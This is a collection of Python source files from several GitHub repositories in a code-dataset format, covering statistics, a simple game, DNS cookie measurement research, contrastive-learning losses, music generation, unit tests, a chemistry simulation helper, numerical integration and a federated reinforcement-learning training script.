\"\"\"\n Return a string representation of the object.\n \"\"\"\n s = super(MultivariateT, self).__str__() + '\\n'\n s += 'mu:\\n'\n s += str(self.mu) + '\\n'\n s += 'C:\\n'\n s += str(self.C) + '\\n'\n s += 'nu:\\n'\n s += str(self.nu)\n return s\n","repo_name":"ebilionis/variational-reformulation-of-inverse-problems","sub_path":"vuq/_multivariate_t.py","file_name":"_multivariate_t.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"5611439532","text":"import glm\nimport os\nimport sys\n\n# sys.path.append(os.path.dirname(__file__) + \"/../\")\nsys.path.append(sys.path[0] + \"/../\")\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom Source.System.gameObject import *\n\n\nclass GameObject(Sprite):\n\n def __init__(self):\n super().__init__()\n # texture obj\n self.Texture = \"\"\n self.Color = glm.vec3(1.0, 1.0, 1.0)\n # flags\n self.IsSolid = False\n self.Destroyed = False\n\n def Draw(self, system):\n system.SpriteRenderer.DrawNoTex(self.position, self.Size,\n self.Rotation, self.Color, self.Grid, self.Selected)\n\n\nclass BallObject(Sprite):\n\n def __init__(self):\n super().__init__()\n # ball attributes\n self.Radius = float(0)\n self.Stuck = True\n\n def BallMove(self, dt, window_width):\n if not self.Stuck:\n self.position = self.position + (self.Velocity * dt)\n\n if self.position.x <= 0.0:\n self.Velocity.x = -self.Velocity.x\n self.position.x = 0.0\n\n elif (self.position.x + self.Size.x) >= window_width:\n self.Velocity.x = -self.Velocity.x\n self.position.x = window_width - self.Size.x\n\n if self.position.y <= 0.0:\n self.Velocity.y = -self.Velocity.y\n self.position.y = 0.0\n\n return self.position\n\n def Reset(self, position, velocity):\n self.position = position\n self.Velocity = velocity\n self.Stuck = True\n\n\n","repo_name":"KingAiba/FYPEngine","sub_path":"Game/GameObjectV2.py","file_name":"GameObjectV2.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72587348809","text":"\"\"\"\nBase script for measuring whether IPs return server cookies.\nBy default, we'll retry the server a number of times if errors are received\n\"\"\"\n\nimport argparse\nimport json\nimport multiprocessing as mp\nimport signal\nimport sys\nimport time\nfrom typing import Union\n\nimport dns.resolver\nfrom dns.edns import GenericOption\nfrom dns.message import make_query\nfrom shared.query_parser_generator import QnameParserGenerator\nfrom tqdm import tqdm\n\nCLIENT_COOKIE_LENGTH = 8\nCOOKIE_OPT = 10\nCOOKIE = \"1e4ddeb526a1da40\"\njson_keys = [\"ip\", \"domain\", \"edns\", \"ccook\", \"scook\", \"slen\", \"rcode\", \"err\", \"isbind\", \"tsdiff\"]\n\n\nclass QPG(QnameParserGenerator):\n \"\"\" defines query format to include timestamp and og ip \"\"\"\n label_str = \"$key.$ts.$ip\"\n\n\ndef makedict(default=None):\n return {key: default for key in json_keys}\n\n\ndef make_cookie_query(qname: str, cookie_hex: str = COOKIE) -> dns.message:\n cookie = GenericOption(COOKIE_OPT, bytes.fromhex(cookie_hex))\n return make_query(qname, dns.rdatatype.A, use_edns=True,\n want_dnssec=False, options=[cookie])\n\n\ndef extract_cooks(r: dns.message.Message) -> (str, str):\n for o in r.options:\n if o.otype == COOKIE_OPT:\n return o.data[:8].hex(), o.data[8:].hex()\n return \"\", \"\"\n\n\ndef is_using_bind(scook: str, current_timestamp: int = None) -> Union[None, int]:\n \"\"\"\n Returns true if the server cookie is 128 bits and has a timestamp at the 5th-8th bytes.\n Bind or bind-like implementations have a timestamp at that location.\n Tolerance for the timestamp is 1hr in past and 30 min in future being valid. This seemed like a good range to use.\n\n :param scook: the cookie returned by the server\n :param current_timestamp: the timestamp to compare against. If none, gets current time\n :return: the difference between the bind ts and current time if bind, else None\n \"\"\"\n if len(scook) != 32: # bind cookie is 128 bits = 16 bytes = 32 hex characters\n return None\n cookie_timestamp = int(scook[8:16], 16)\n if current_timestamp is None:\n current_timestamp = int(time.time())\n if (current_timestamp - 60 * 60) <= cookie_timestamp <= (current_timestamp + 60 * 30):\n return cookie_timestamp - current_timestamp\n return None\n\n\ndef query(input_dict, try_again=5):\n \"\"\"\n :param input_dict: should contain an ip and domain key. IP will be queried for an A record of domain\n :param try_again: if greater than 0, retry up to N times if an error or no server cookie\n :return: a response dict with all relevant data\n \"\"\"\n res = makedict()\n res[\"ip\"] = input_dict[\"ip\"]\n if input_dict['domain'] is None:\n res['domain'] = QPG.gen('cookie-support.example.com', ip_addr=res['ip'], val=try_again)\n else:\n res[\"domain\"] = input_dict[\"domain\"] if \"domain\" in input_dict else input_dict[\"zone\"]\n\n q = make_cookie_query(res[\"domain\"])\n try:\n r: dns.message.Message = dns.query.udp(q, input_dict[\"ip\"], timeout=5)\n except Exception as e:\n if try_again > 0:\n time.sleep(1)\n return query(input_dict, try_again - 1)\n res[\"err\"] = str(e)\n else:\n res[\"ccook\"], res[\"scook\"] = extract_cooks(r)\n if res[\"scook\"] == \"\" and try_again > 0:\n time.sleep(1)\n return query(input_dict, try_again - 1)\n res[\"tsdiff\"] = is_using_bind(res[\"scook\"])\n res[\"rcode\"] = r.rcode()\n res[\"edns\"] = r.edns >= 0\n res[\"isbind\"] = res[\"tsdiff\"] is not None\n res[\"slen\"] = len(res[\"scook\"]) / 2\n\n return res\n\n\ndef main(args):\n parser = argparse.ArgumentParser(description=\"Run a series of dns queries on a list of IPs and record cookie info\")\n parser.add_argument('input', help=\"Input file containing a json lines with ip and optional domain keys. \"\n \"An 'A' query for 'domain' will be sent to 'ip'\")\n parser.add_argument('output', help=\"Output file to write results to\")\n parser.add_argument('-n', '--num-threads', help=\"Number of threads to execute queries\", default=64, type=int)\n parser.add_argument('-g', '--gen-domains', help=\"Generate domains to query for instead of getting from jsonl\",\n action='store_true')\n args = parser.parse_args(args)\n\n print(\"Getting targets...\")\n with open(args.input, 'r') as in_file:\n targets = [json.loads(t) for t in in_file.readlines()]\n if args.gen_domains:\n for t in targets:\n t[\"domain\"] = None\n\n threads = min(args.num_threads, len(targets))\n\n print(\"Starting threads...\")\n with open(args.output, 'w') as output:\n with mp.Pool(processes=threads, initializer=lambda: signal.signal(signal.SIGINT, signal.SIG_IGN)) as p:\n try:\n for result in tqdm(p.imap_unordered(query, targets), total=len(targets), unit=\"query\"):\n output.write(json.dumps(result) + \"\\n\")\n except KeyboardInterrupt:\n p.terminate()\n p.join()\n print(\"Exiting early from queries.\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"byu-imaal/dns-cookies-pam21","sub_path":"cookie_support.py","file_name":"cookie_support.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19950812810","text":"import torch\nimport torch.nn.functional as F\n\ndef oneway_infonce_loss(a, b, t, smoothing=0.0, labels=None):\n logits = (F.normalize(a) @ F.normalize(b.T)) * torch.exp(t).clamp(max=100)\n loss = F.cross_entropy(logits, labels, label_smoothing=smoothing).mean()\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n accuracy = torch.sum(preds == labels) / len(a)\n \n return loss, accuracy\n\ndef infonce_loss(a, b, t, smoothing=0.0, labels=None):\n batch_size = a.shape[0]\n logits = (F.normalize(a) @ F.normalize(b.T)) * torch.exp(t).clamp(max=100)\n gt = torch.arange(0, batch_size, device=logits.device) \n '''\n if labels is not None:\n loss_a = F.cross_entropy(logits.T, gt, label_smoothing=smoothing, reduction='none')[labels.long()].mean()\n loss_b = F.cross_entropy(logits, gt, label_smoothing=smoothing, reduction='none')[labels.long()].mean()\n\n loss = (loss_a + loss_b) / 2\n else:'''\n loss = (F.cross_entropy(logits.T, gt, label_smoothing=smoothing).mean() +\n F.cross_entropy(logits, gt, label_smoothing=smoothing).mean()) / 2\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n preds_t = logits.T.argmax(-1)\n\n accuracy = (torch.sum(preds == gt) +\n torch.sum(preds_t == gt)) / (batch_size * 2)\n\n return loss, accuracy\n\ndef flatnce_loss(a, b, t, smoothing=0.0, labels=None):\n #from https://github.com/Junya-Chen/FlatCLR/blob/main/flatclr.py\n\n batch_size = a.shape[0]\n logits = (F.normalize(a) @ F.normalize(b.T))# * torch.exp(t).clamp(max=100)\n labels = torch.arange(0, batch_size, device=logits.device)\n\n # discard the main diagonal from both: labels and similarities matrix\n mask = 1 - torch.eye(batch_size).to(logits.device) # Positive and negative example similarities\n logits_pos = torch.diagonal(logits).view(batch_size, -1) # Get positive similarities\n\n clogits_a = mask * (logits - logits_pos) * torch.exp(t).clamp(max=100, min=-100)\n clogits_b = mask * (logits.T - logits_pos) * torch.exp(t).clamp(max=100, min=-100) \n\n sum_a = torch.logsumexp(clogits_a, dim=1) - 1 # To offset exp(0) per row\n sum_b = torch.logsumexp(clogits_b, dim=1) - 1 \n sum_clogits = torch.cat([sum_a, sum_b], dim=0)\n\n loss_vector = torch.exp(sum_clogits-sum_clogits.detach())\n \n with torch.no_grad():\n dummy_logits = logits * mask\n dummy_loss = (F.cross_entropy(dummy_logits.T, labels, label_smoothing=smoothing).mean() +\n F.cross_entropy(dummy_logits, labels, label_smoothing=smoothing).mean()) / 2\n\n loss = loss_vector.mean() - 1 + dummy_loss\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n preds_t = logits.T.argmax(-1)\n\n accuracy = (torch.sum(preds == labels) +\n torch.sum(preds_t == labels)) / (batch_size * 2)\n\n return loss, accuracy\n\nclass SupConLoss(torch.nn.Module):\n \"\"\"Supervised Contrastive Learning: https://arxiv.org/pdf/2004.11362.pdf.\n It also supports the unsupervised contrastive loss in SimCLR\"\"\"\n def __init__(self, t_0=0.07, eps=1e-8):\n super(SupConLoss, self).__init__()\n self.temperature = torch.nn.Parameter(torch.tensor([t_0]))\n self.epsilon = eps\n\n\n def forward(self, features, labels):\n \"\"\"Compute loss for model. If both `labels` and `mask` are None,\n it degenerates to SimCLR unsupervised loss:\n https://arxiv.org/pdf/2002.05709.pdf\n Args:\n features: hidden vector of shape [bsz, n_views, ...].\n labels: ground truth of shape [bsz].\n Returns:\n A loss scalar.\n \"\"\"\n batch_size = features.shape[0]\n\n if len(features.shape) < 3:\n raise ValueError('`features` needs to be [bsz, n_views, ...],'\n 'at least 3 dimensions are required')\n if len(features.shape) > 3:\n features = features.view(features.shape[0], features.shape[1], -1)\n\n labels = labels.contiguous().view(-1, 1)\n if labels.shape[0] != batch_size:\n raise ValueError('Num of labels does not match num of features')\n mask = torch.eq(labels, labels.T).float().to(features.device)\n\n views = features.shape[1] # = n_views\n full_features = torch.cat(torch.unbind(features, dim=1), dim=0) # = [bsz*views, ...]\n\n # compute logits (cosine sim)\n anchor_dot_contrast = torch.matmul(F.normalize(full_features),\n F.normalize(full_features.T)) * torch.exp(self.temperature).clamp(100) # = [bsz*views, bsz*views]\n\n loss_0 = self._loss_from_dot(anchor_dot_contrast, mask, views, batch_size)\n loss_1 = self._loss_from_dot(anchor_dot_contrast.T, mask.T, views, batch_size)\n\n return (loss_0 + loss_1) / 2\n\n def _loss_from_dot(self, anchor_dot_contrast, mask, views, batch_size): #(anchor, contrast)\n # for numerical stability\n logits_max, _ = torch.max(anchor_dot_contrast, dim=1, keepdim=True)\n logits = anchor_dot_contrast - logits_max.detach()\n\n # tile mask\n mask = mask.repeat(views, views)\n # mask-out self-contrast cases\n logits_mask = 1 - torch.eye(views*batch_size, device=mask.device)\n mask = mask * logits_mask\n\n # compute log_prob\n exp_logits = torch.exp(logits) * logits_mask\n log_prob = logits - torch.log(exp_logits.sum(1, keepdim=True) + self.epsilon)\n\n # compute mean of log-likelihood over positive\n mean_log_prob_pos = (mask * log_prob).sum(1) / mask.sum(1)\n\n loss = - mean_log_prob_pos.view(views, batch_size).mean()\n\n return loss\n\nclass InfoNCELoss(torch.nn.Module):\n def __init__(self, t_0=0.07, eps=1e-8):\n super(InfoNCELoss, self).__init__()\n self.temperature = torch.nn.Parameter(torch.tensor([t_0]))\n\n def forward(self, anchors, replicas):\n batch_size = anchors.shape[0]\n logits = (F.normalize(anchors) @ F.normalize(replicas.T)) * torch.exp(self.temperature).clamp(max=100)\n gt = torch.arange(0, batch_size, device=logits.device) \n\n loss = (F.cross_entropy(logits.T, gt).mean() +\n F.cross_entropy(logits, gt).mean()) / 2\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n preds_t = logits.T.argmax(-1)\n\n accuracy = (torch.sum(preds == gt) +\n torch.sum(preds_t == gt)) / (batch_size * 2)\n\n return loss, accuracy\n","repo_name":"jahuerta92/authorship-embeddings","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"27657232498","text":"import copy\nimport numpy as np\nimport tensorflow as tf\nfrom keras import Input, Model\nfrom keras.layers import Bidirectional, Dense, Dropout, LSTM\nfrom keras.optimizers import Adam\n\nfrom examples import remove_rhythm\nfrom musicLoading import make_midi, load_data\n\ndef get_model_to_train():\n inputs = Input(shape=(256,8), dtype=tf.int64)\n # inputs = Input(shape=X_train[0].shape)\n\n lstm = Bidirectional(LSTM(124), merge_mode='concat', dtype=tf.int64)(inputs)\n pred1 = Dense(88, activation='sigmoid')(lstm)\n\n pred = Dropout(.4)(pred1)\n\n model = Model(inputs=inputs, outputs=[pred])\n opt = tf.keras.optimizers.Adam(lr=1e-3, decay=1e-5)\n model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n\n\ndef recursive_predic(model, startingData):\n result = copy.deepcopy(startingData)\n\n result.append([85,84,83,82,81,80,0,0])\n\n curData = copy.deepcopy(startingData)\n for i in range(16 * 32):\n curData = np.array([curData])\n newNotes = model.predict(curData)[0]\n notes = [0] * 8\n\n noteCount = 0\n\n for note in range(len(newNotes)):\n if newNotes[note] > .25:\n notes[noteCount] = note\n noteCount+=1\n if noteCount == 8:\n break\n\n result.append(notes)\n curData = np.delete(curData[0], 0, axis=0)\n curData = np.append(curData, [notes], axis=0)\n # curData = np.array([curData)\n\n print(\"Raw results\", result)\n\n return result\n\ndef results_to_midi(results):\n quantized = []\n\n for beat in results:\n curBeatNotes = []\n\n for note in beat:\n if note == 0:\n break;\n\n curBeatNotes.append([note + 21, 1])\n\n quantized.append(curBeatNotes)\n\n midi = make_midi(quantized, 480)\n midi.open(\"single notes.mid\", 'wb')\n midi.write()\n\nif __name__ == '__main__':\n session = tf.Session(config=tf.ConfigProto(log_device_placement=True))\n # print(device_lib.list_local_devices())\n\n input_size = 256\n\n\n\n inputs = Input(shape=(256,8))\n lstm = Bidirectional(LSTM(124), merge_mode='concat')(inputs)\n pred1 = Dense(88, activation='sigmoid')(lstm)\n\n pred = Dropout(.4)(pred1)\n model = Model(inputs=inputs, outputs=[pred])\n opt = Adam(lr=1e-3, decay=1e-5)\n\n model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n model.load_weights('best_weights.hdf5')\n\n\n midData = load_data(\"/home/whomagoo/github/MLMusic/Music/kunstderfuge.com/scarlatti 109.mid\")\n\n notes = remove_rhythm(midData)\n notes = notes[:input_size]\n\n # starting_notes = [[72, 64, 0, 0, 0, 0, 0, 0], [72, 69, 52, 0, 0, 0, 0, 0], [64, 0, 0, 0, 0, 0, 0, 0], [63, 0, 0, 0, 0, 0, 0, 0], [64, 0, 0, 0, 0, 0, 0, 0], [68, 71, 52, 0, 0, 0, 0, 0], [64, 0, 0, 0, 0, 0, 0, 0], [84, 72, 57, 0, 0, 0, 0, 0]]\n # padded_input = [[0] * 8] * (input_size - len(starting_notes)) + starting_notes\n\n i = 0\n for chord in notes:\n j = 0\n for note in chord:\n if note != 0:\n notes[i][j] -= 21\n\n j+=1\n i+=1\n\n results = recursive_predic(model, notes)\n\n print(results)\n\n results_to_midi(results)\n\n session.close()","repo_name":"WHOmagoo/Machine-Learning-Music","sub_path":"src/first_version.py","file_name":"first_version.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35914004390","text":"import unittest\nimport os\nfrom .helper import UtilityMethods\nimport multisite\n\n\nclass TestLocal(UtilityMethods):\n def test_add_local_site(self):\n config_file = os.path.join(self.workspace, 'add_local_site.json')\n msite = multisite.Multisite(config_file=config_file)\n msite.add_site('local', 'local-site', source_type='local')\n expected = {\n \"local\": {\n \"name\": \"local\",\n \"source\": \"local-site\",\n \"location\": \"local-site\",\n \"source_type\": \"local\",\n \"auto_update\": False\n }\n }\n self.assertDictEqual(msite.sites, expected)\n\n def test_existing_config_file(self):\n config_file = os.path.join('configs', 'local.json')\n msite = multisite.Multisite(config_file=config_file)\n expected = {\n \"local-site\": {\n \"name\": \"local-site\",\n \"source\": \"local-site/\",\n \"location\": \"local-site/\",\n \"source_type\": \"local\",\n \"auto_update\": False\n }\n }\n self.assertDictEqual(msite.sites, expected)\n\n def test_bad_directory_path(self):\n config_file = os.path.join('configs', 'local.json')\n msite = multisite.Multisite(config_file=config_file)\n with self.assertRaises(OSError):\n msite.add_site(\n 'bad-dir',\n os.path.join('archives', 'zip-site.zip'),\n source_type='local'\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cmccandless/multisite","sub_path":"tests/local_test.py","file_name":"local_test.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7368187078","text":"# list of parameters (in this case torsional angle Y)\nPARAMETER_LIST = range(-180, 185, 5)\n\n# user defined function to start a job, depending on one element from PARAMETER_LIST\ndef run_calc(param):\n \n # modules necessary for running the job\n import os\n import shutil\n \n # user variables for calculation\n PLACEHOLDER = \"RESTRAINT_2\" # placeholder in CAST.txt file that is replaced by step number\n \n # create folder for current window\n os.mkdir(\"f_{}\".format(param))\n\n # copy necessary files to that folder (USER INPUT)\n shutil.copy(\"CAST.txt\", \"f_{}/CAST.txt\".format(param))\n shutil.copy(\"pentan.arc\", \"f_{}/pentan.arc\".format(param))\n shutil.copy(\"charmm22.prm\", \"f_{}/charmm22.prm\".format(param))\n shutil.copy(\"/home/susanne/CAST/optional_files/build/CAST_linux_x64_release\",\n \"f_{}/CAST.exe\".format(param))\n \n # important: set correct parameter in inputfile\n with open(\"f_{}/CAST.txt\".format(param)) as inp:\n x = inp.read()\n x = x.replace(PLACEHOLDER,str(float(param)))\n with open(\"f_{}/CAST.txt\".format(param),\"w\") as inp:\n inp.write(x)\n \n # submit calculation\n os.chdir(\"f_{}\".format(param))\n os.popen(\"chmod +x CAST.exe\")\n os.popen(\"./CAST.exe | tee CAST_OUTPUT.txt\")\n os.chdir(\"..\")\n\n\n########################################### PROGRAM ########################################\n\nfor p in PARAMETER_LIST:\n run_calc(p)\n \n","repo_name":"AKEngels/CAST","sub_path":"optional_files/scripts/umbrella_stuff/umbrella2d_helper.py","file_name":"umbrella2d_helper.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41935628573","text":"from math import pi\n\nimport view\nimport integral\n\n\ndef main() -> None:\n tetta = [0.05, 0.05, 10.0]\n\n ns, ms = [], []\n md1s, md2s = [], []\n ints = []\n\n terminate = '0'\n while terminate == '0':\n try:\n ns.append(int(input(\"Input N: \")))\n ms.append(int(input(\"Input M: \")))\n param = float(input(\"Enter parameter: \"))\n print(\"Entry integration mode (0 - Gauss, 1 - Simpson)\")\n md1s.append(int(input(\"Outer integration mode: \")))\n md2s.append(int(input(\"Inner integration mode: \")))\n except ValueError:\n print(\"Invalid input data. Program is terminated.\")\n return\n\n lm = [[0, pi / 2], [0, pi / 2]]\n\n ints.append(integral.Integral(lm, [ns[-1], ms[-1]], [md1s[-1], md2s[-1]]))\n\n print(\"Result with {} as a parameter is {:.5f}\".format(tetta, ints[-1](param)))\n\n terminate = input(\"If you want stop execution, entry not 0?: \")\n view.plot(ints, tetta, ns, ms, md1s, md2s)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Flash1ee/ca-labs-4th-sem-bmstu","sub_path":"lab_05/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1541886484","text":"# -*- coding: utf-8 -*-\n#from __future__ import division\nimport argparse\nimport bz2\nfrom datetime import datetime\nimport os\nimport sys\n\nsys.path.append('../..')\nsys.path.append('./')\n\nimport pickle\nimport GLOBAL_PRARM as gp\n\nimport numpy as np\nimport math\nimport copy\nimport torch\nfrom tqdm import trange\nfrom collections import defaultdict, deque\n\nimport multiprocessing\nimport torch.multiprocessing\n# torch.multiprocessing.set_sharing_strategy('file_system')\n# TODO: When running in server, uncomment this line if needed\nimport copy as cp\n\nfrom acer_fedstep.agent import Agent\nfrom game import Decentralized_Game as Env\nfrom memory import ReplayMemory\nfrom test import test, test_p\n\n# from pympler.tracker import SummaryTracker\n# tracker = SummaryTracker()\n\n# Note that hyperparameters may originally be reported in ATARI game frames instead of agent steps\nparser = argparse.ArgumentParser(description='Rainbow')\nparser.add_argument('--id', type=str, default='default_acer_q', help='Experiment ID')\nparser.add_argument('--seed', type=int, default=123, help='Random seed')\nparser.add_argument('--disable-cuda', action='store_true', help='Disable CUDA')\nparser.add_argument('--T-max', type=int, default=int(50e6), metavar='STEPS',\n help='Number of training steps (4x number of frames)')\nparser.add_argument('--max-episode-length', type=int, default=int(108e3), metavar='LENGTH',\n help='Max episode length in game frames (0 to disable)')\n# TODO: Note that the change of UAV numbers should also change the history-length variable\nparser.add_argument('--previous-action-observable', action='store_false', help='Observe previous action? (AP)')\nparser.add_argument('--current-action-observable', action='store_true', help='Observe previous action? (AP)')\nparser.add_argument('--history-length', type=int, default=2, metavar='T',\n help='Total number of history state')\nparser.add_argument('--architecture', type=str, default='canonical_61obv_16ap', metavar='ARCH', help='Network architecture')\n# TODO: if select resnet8, obs v8 and dims 4 should be set in gp\nparser.add_argument('--hidden-size', type=int, default=256, metavar='SIZE', help='Network hidden size')\nparser.add_argument('--noisy-std', type=float, default=0.3, metavar='σ',\n help='Initial standard deviation of noisy linear layers')\nparser.add_argument('--atoms', type=int, default=21, metavar='C', help='Discretised size of value distribution')\nparser.add_argument('--V-min', type=float, default=-1, metavar='V', help='Minimum of value distribution support')\nparser.add_argument('--V-max', type=float, default=1, metavar='V', help='Maximum of value distribution support')\n# TODO: Make sure the value located inside V_min and V_max\nparser.add_argument('--epsilon-min', type=float, default=0.0, metavar='ep_d', help='Minimum of epsilon')\nparser.add_argument('--epsilon-max', type=float, default=0.0, metavar='ep_u', help='Maximum of epsilon')\nparser.add_argument('--epsilon-delta', type=float, default=0.0001, metavar='ep_d', help='Decreasing step of epsilon')\n# TODO: Set the ep carefully\nparser.add_argument('--action-selection', type=str, default='boltzmann', metavar='action_type',\n choices=['greedy', 'boltzmann', 'no_limit'],\n help='Type of action selection algorithm, 1: greedy, 2: boltzmann')\nparser.add_argument('--model', type=str, default=None, metavar='PARAM', help='Pretrained model (state dict)')\nparser.add_argument('--memory-capacity', type=int, default=int(12e3), metavar='CAPACITY',\n help='Experience replay memory capacity')\nparser.add_argument('--replay-frequency', type=int, default=4, metavar='k', help='Frequency of sampling from memory')\nparser.add_argument('--priority-exponent', type=float, default=0.5, metavar='ω',\n help='Prioritised experience replay exponent (originally denoted α)')\nparser.add_argument('--priority-weight', type=float, default=0.4, metavar='β',\n help='Initial prioritised experience replay importance sampling weight')\nparser.add_argument('--multi-step', type=int, default=1, metavar='n',\n help='Number of steps for multi-step return')\nparser.add_argument('--discount', type=float, default=1, metavar='γ', help='Discount factor')\nparser.add_argument('--target-update', type=int, default=int(4000), metavar='τ',\n help='Number of steps after which to update target network')\nparser.add_argument('--reward-clip', type=int, default=1, metavar='VALUE', help='Reward clipping (0 to disable)')\nparser.add_argument('--learning-rate', type=float, default=0.0000625, metavar='η', help='Learning rate')\nparser.add_argument('--reward-update-rate', type=float, default=0.01, metavar='η',\n help='Average value step rate (for non-episodic task)')\nparser.add_argument('--adam-eps', type=float, default=1.5e-4, metavar='ε', help='Adam epsilon')\nparser.add_argument('--batch-size', type=int, default=32, metavar='SIZE', help='Batch size')\nparser.add_argument('--better-indicator', type=float, default=1.05, metavar='b',\n help='The new model should be b times of old performance to be recorded')\n# TODO: Switch interval should not be large\nparser.add_argument('--learn-start', type=int, default=int(400), metavar='STEPS',\n help='Number of steps before starting training')\nparser.add_argument('--evaluate', action='store_true', help='Evaluate only')\nparser.add_argument('--data-reinforce', action='store_true', help='DataReinforcement')\n# TODO: Change this after debug\nparser.add_argument('--evaluation-interval', type=int, default=400, metavar='STEPS',\n help='Number of training steps between evaluations')\nparser.add_argument('--evaluation-episodes', type=int, default=1000, metavar='N',\n help='Number of evaluation episodes to average over')\n# TODO: Note that DeepMind's evaluation method is running the latest agent for 500K frames ever every 1M steps\n# TODO: Change this after debug\nparser.add_argument('--evaluation-size', type=int, default=20, metavar='N',\n help='Number of transitions to use for validating Q')\n# TODO: This evaluation-size is used for Q value evaluation, can be small if Q is not important\nparser.add_argument('--render', action='store_false', help='Display screen (testing only)')\nparser.add_argument('--enable-cudnn', action='store_true', help='Enable cuDNN (faster but nondeterministic)')\nparser.add_argument('--checkpoint-interval', default=0,\n help='How often to checkpoint the model, defaults to 0 (never checkpoint)')\nparser.add_argument('--memory', type=str,\n help='Path to save/load the memory from')\nparser.add_argument('--disable-bzip-memory', action='store_false',\n help='Don\\'t zip the memory file. Not recommended (zipping is a bit slower and much, much smaller)')\n# TODO: Change federated round each time\nparser.add_argument('--federated-round', type=int, default=20, metavar='F',\n help='Rounds to perform global combination, set a negative number to disable federated aggregation')\n\n# Setup\nargs = parser.parse_args()\n\nprint(' ' * 26 + 'Options')\nfor k, v in vars(args).items():\n print(' ' * 26 + k + ': ' + str(v))\nresults_dir = os.path.join('./results', args.id)\nif not os.path.exists(results_dir):\n os.makedirs(results_dir)\n\nmetrics = {'steps': [], 'rewards': [], 'Qs': [], 'best_avg_reward': -float('inf')}\nmetrics_all = {'steps': [], 'reward': []}\nnp.random.seed(args.seed)\ntorch.manual_seed(np.random.randint(1, 10000))\n# if torch.cuda.is_available() and not args.disable_cuda:\n# args.device = torch.device('cuda')\n# torch.cuda.manual_seed(np.random.randint(1, 10000))\n# torch.backends.cudnn.enabled = args.enable_cudnn\n# else:\n# args.device = torch.device('cpu')\nargs.device = torch.device('cpu')\n\n\n# Simple ISO 8601 timestamped logger\ndef log(s):\n print('[' + str(datetime.now().strftime('%Y-%m-%dT%H:%M:%S')) + '] ' + s)\n\n\ndef average_weights(list_of_weight):\n \"\"\"aggregate all weights\"\"\"\n averga_w = copy.deepcopy(list_of_weight[0])\n for key in averga_w.keys():\n for ind in range(1, len(list_of_weight)):\n averga_w[key] += list_of_weight[ind][key]\n averga_w[key] = torch.div(averga_w[key], len(list_of_weight))\n return averga_w\n\n\ndef load_memory(memory_path, disable_bzip):\n if disable_bzip:\n with open(memory_path, 'rb') as pickle_file:\n return pickle.load(pickle_file)\n else:\n with bz2.open(memory_path, 'rb') as zipped_pickle_file:\n return pickle.load(zipped_pickle_file)\n\n\ndef save_memory(memory, memory_path, disable_bzip, index=-1):\n # save ap mem\n memory_path = memory_path[0:-4] + str(index) + memory_path[-4:]\n if disable_bzip:\n with open(memory_path, 'wb') as pickle_file:\n pickle.dump(memory, pickle_file)\n else:\n with bz2.open(memory_path, 'wb') as zipped_pickle_file:\n pickle.dump(memory, zipped_pickle_file)\n\n\ndef run_game_once_parallel_random(new_game, train_history_aps_parallel, episode):\n train_examples_aps = []\n for _ in range(new_game.environment.ap_number):\n train_examples_aps.append([])\n eps, done = 0, True\n while eps < episode:\n if done:\n done = new_game.reset()\n state, action, action_logp, avail, reward, done, _ = new_game.step() # Step\n for index_p, ele_p in enumerate(state):\n neighbor_indice = new_game.environment.coop_graph.neighbor_indices(index_p, True)\n action_patch = np.append(action, [-1])\n train_examples_aps[index_p].append((ele_p, action[index_p], action_logp[index_p],\n action_patch[neighbor_indice],\n action, avail[index_p], reward[index_p], done))\n eps += 1\n train_history_aps_parallel.append(train_examples_aps)\n\n\n# Environment\nenv = Env(args)\naction_space = env.get_action_size()\n\n# Agent\ndqn = []\nmatric = []\nfor _ in range(env.environment.ap_number):\n # dqn.append(temp)\n dqn.append(Agent(args, env, _))\n matric.append(copy.deepcopy(metrics))\n\nglobal_model = Agent(args, env, \"Global_\")\n\n# If a model is provided, and evaluate is fale, presumably we want to resume, so try to load memory\nif args.model is not None and not args.evaluate:\n if not args.memory:\n raise ValueError('Cannot resume training without memory save path. Aborting...')\n elif not os.path.exists(args.memory):\n raise ValueError('Could not find memory file at {path}. Aborting...'.format(path=args.memory))\n\n mem_aps = []\n for index in range(env.environment.ap_number):\n path = os.path.join(args.memory, ('metrics_aps' + str(index) + '.pth'))\n mem_aps.append(load_memory(path, args.disable_bzip_memory))\nelse:\n mem_aps = []\n for _ in range(env.environment.ap_number):\n mem_aps.append(ReplayMemory(args, args.memory_capacity, env.remove_previous_action))\n\ntry:\n sis_list = dqn[0].assign_sister_nodes\nexcept AttributeError:\n pass\nelse:\n for _ in range(env.environment.ap_number):\n dqn[_].assign_sister_nodes(dqn, mem_aps)\n# assign sister nodes for MADDPG\n\npriority_weight_increase = (1 - args.priority_weight) / (args.T_max - args.learn_start)\n\n# Construct validation memory\nval_mem_aps = []\nfor _ in range(env.environment.ap_number):\n val_mem_aps.append(ReplayMemory(args, args.evaluation_size, env.remove_previous_action))\nif 